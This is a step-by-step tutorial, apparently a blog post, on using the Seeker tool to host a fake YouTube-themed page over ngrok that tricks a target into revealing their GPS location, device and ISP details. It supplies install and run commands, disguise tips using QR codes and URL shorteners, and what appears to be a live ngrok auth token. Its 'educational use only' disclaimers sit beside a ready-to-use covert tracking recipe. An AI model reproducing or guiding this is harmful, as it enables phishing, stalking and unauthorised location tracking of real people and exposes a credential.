# Finding Someone's Location with Seeker ## 📍 **How to Use Seeker to Get Location via Social Engineering (Educational Purpose)** ### ⚠️ Disclaimer: This guide is for **ethical hacking and cybersecurity learning only**. Always obtain permission from targets. Misuse may result in **legal consequences**. *** ### 🛠️ **What is Seeker?** **Seeker** is an open-source tool developed by **TheWhiteH4t** that can generate a fake web page to **socially engineer and capture the victim’s location** using their device’s geolocation feature. *** ### 🧰 **Requirements** * Linux OS (Kali Linux or Ubuntu preferred) * Python 3 * Git * Ngrok (for hosting externally) *** ### 🪜 **Step-by-Step Guide** #### 🔹 1. **Install Seeker** Open your terminal and run: ```bash git clone https://github.com/thewhiteh4t/seeker.git cd seeker/ chmod +x install.sh ./install.sh ``` #### 🔹 2. **Run Seeker** Make sure Python 3 is installed, then run: ```bash ################## # Usage Examples # ################## # Step 1 : In first terminal $ python3 seeker.py # Step 2 : In second terminal start a tunnel service such as ngrok $ ./ngrok http 8080 ########### # Options # ########### # Ouput KML File for Google Earth $ python3 seeker.py -k # Use Custom Port $ python3 seeker.py -p 1337 $ ./ngrok http 1337 # Pre-select a specific template $ python3 seeker.py -t 1 ``` *** ### 🌐 **Setting Up External Access with Ngrok** #### 🔹 3. **Download Ngrok** Open a browser and visit [https://ngrok.com](https://ngrok.com/). Sign in or register, then: * Copy the download link for Linux. * In the terminal, run: ```bash curl -sSL https://ngrok-agent.s3.amazonaws.com/ngrok.asc \ | sudo tee /etc/apt/trusted.gpg.d/ngrok.asc >/dev/null \ && echo "deb https://ngrok-agent.s3.amazonaws.com buster main" \ | sudo tee /etc/apt/sources.list.d/ngrok.list \ && sudo apt update \ && sudo apt install ngrok ``` #### 🔹 4. **Authenticate Ngrok** Get your **auth token** from your Ngrok dashboard and run: ```bash ngrok config add-authtoken 22VSdPVkLSe5meidCxV6r4uKaSv_3BJPSS3z8PfrzhrkLLMHp ``` *** ### 🎯 **Create a Phishing Page** You can use **custom templates** in Seeker. * Seeker will ask for a YouTube video link (for disguise). * Paste the link when prompted. * Provide a site name and title (e.g., “Watch Now”, “Trending Video”). * Optionally, add an image URL and description. *** ### 🌍 **Expose Localhost to the Internet** In a new terminal window: ```bash ngrok http http://localhost:8080 ``` Ngrok will generate a **public forwarding link**. This is the URL you will share with your "victim" (legally and ethically!). *** ### 📲 **Delivering the Link** Options: * Send the Ngrok URL directly * Convert it into a QR code using any generator (e.g., ) * Use URL shorteners for better disguise *** ### 📌 **Capture Location Data** Once the target opens the link and gives browser permission: * Seeker logs their **latitude, longitude, device info, and ISP details** * A clickable **Google Maps link** will be available *** ### 📌 **Note for Cybersecurity Students** This is a **classic social engineering attack** using a fake landing page. It’s commonly used in **red teaming** and **penetration testing assessments** to test user awareness. *** ### 🎓 **Educational Use Only** Do NOT use Seeker for: * Stalking * Unauthorized tracking * Spying Use it in **legal penetration tests, CTFs, and lab environments only.**